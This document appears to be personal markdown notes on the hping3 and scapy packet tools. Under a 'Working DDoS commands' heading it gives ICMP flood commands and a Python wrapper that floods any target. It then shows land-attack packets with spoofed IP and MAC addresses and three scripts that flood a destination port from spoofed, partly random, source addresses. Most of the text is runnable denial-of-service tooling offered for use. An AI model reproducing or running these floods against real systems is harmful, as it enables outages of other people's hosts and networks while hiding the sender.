# hping3

### Install hping3
sudo apt-get install hping3


For ICMP code Destination Host Unreachable:
```
hping3 10.0.0.4 -q -I eth1 --icmp -C 3 -K 0 -c 4 --faster
hping3 10.0.0.4 -q -I eth1 --icmp -C 3 -K 0 -i u10

-q  --quiet     quiet
-I  --interface interface name (otherwise default routing interface)
-C  --icmptype   icmp type (default echo request) // 3 - Destination Unreachable
-K  --icmpcode   icmp code (default 0)
-i  --interval  wait (uX for X microseconds, for example -i u1000)
```
Working DDoS commands:
```
hping 10.0.0.4 -q --icmp -C 3 -K 0 -d 4000 --faster
hping 10.0.0.4 -q --icmp -d 4000 --faster
hping 10.0.0.4 -q --icmp -d 4000 --flood
```

```
import os, sys
os.system(f'hping3 {sys.argv[1]} -q --icmp -d 4000 --flood')
```

# scapy
https://sekurak.pl/generator-pakietow-scapy/

https://sekurak.pl/generator-pakietow-scapy-czesc-2/

https://null-byte.wonderhowto.com/how-to/create-packets-from-scratch-with-scapy-for-scanning-dosing-0159231/ \
Tool used for creating and manipulating packets. \
As a hacker, we often want to create a unique packet that may not be RFC-compliant to gather information on a target (i.e., scanning). Additionally, one could create a DoS condition by building a packet that causes the target system to crash (e.g., land attack, ping of death, fragroute, etc.). \

Other packet generators: sendip, nemesis, netdude, hping

### Install scapy
`pip3 install scapy` (powinno być domyślnie zainstalowane)

### Run scapy
`sudo scapy`

### Create packet

`x = IP(ttl=64)` \
`x.src="192.168.0.1"` \
`x.dst="192.168.0.2"`

### Land attack
"Land" attack, a DoS attack that sends an oversized packet to the target with the same source and destination IP address, as well as the same source and destination port. It doesn't always crash the system but will slow it down considerably. For web servers, slowing them down is effectively a DoS.

`send(IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)`

IP defines the protocol for IP addresses; src="192.168.1.122" is the source IP address; dst="192.168.1.122" is the destination IP address; TCP defines the protocol for the ports; sport=135 defines the source port, dport=135 defines the destination port; and count=2000 defines the number of packets to send.

The only problem with what we've done above is that we've given away our MAC address. I'm sure I don't have to tell you why this would be an issue, but a MAC address can give away the manufacturer of your machine, giving away the fact that you're not who you say you are. \
The send function sends packets at layer 3 so it handles the routing and layer 2 for you. However, sendp works at layer 2.

`sendp(Ether(src="aa:bb:cc:dd:ee:ff")/IP(src="192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)`

Ether specifies it's an Ethernet layer (so it's LAN only); src="aa:bb:cc:dd:ee:ff" is the spoofed source MAC address's value; IP defines the protocol for IP addresses; src="192.168.1.122" is the source IP address; dst="192.168.1.122" is the destination IP address; TCP defines the protocol for the ports; sport=135 defines the source port, dport=135 defines the destination port; and count=2000 defines the number of packets to send.


```
# python3 main.py src_ip dst_ip sport dport

from scapy.layers.inet import *
from scapy.sendrecv import *
import sys

send(IP(src=sys.argv[1], dst=sys.argv[2])/TCP(sport=int(sys.argv[3]), dport=int(sys.argv[4])), count=10)
```



```
# Single IP Multiple port
#python3 main.py src_ip dst_ip dport

from scapy.layers.inet import *
from scapy.sendrecv import *
import sys

for srcport in range(1, 65535):
    send(IP(src=sys.argv[1], dst=sys.argv[2]) / TCP(sport=srcport, dport=int(sys.argv[3])), inter=.001)
```



```
# Multiple IP multiple port
# python3 main.py dst_ip dport

from scapy.layers.inet import *
from scapy.sendrecv import *
from random import randint
import sys

for i in range(1, 10):
    srcport = randint(1,65535)
    srcip = f"{randint(1, 254)}.{randint(1, 254)}.{randint(1, 254)}.{randint(1, 254)}"
    send(IP(src=srcip, dst=sys.argv[1]) / TCP(sport=srcport, dport=int(sys.argv[2])), inter=.001)
```
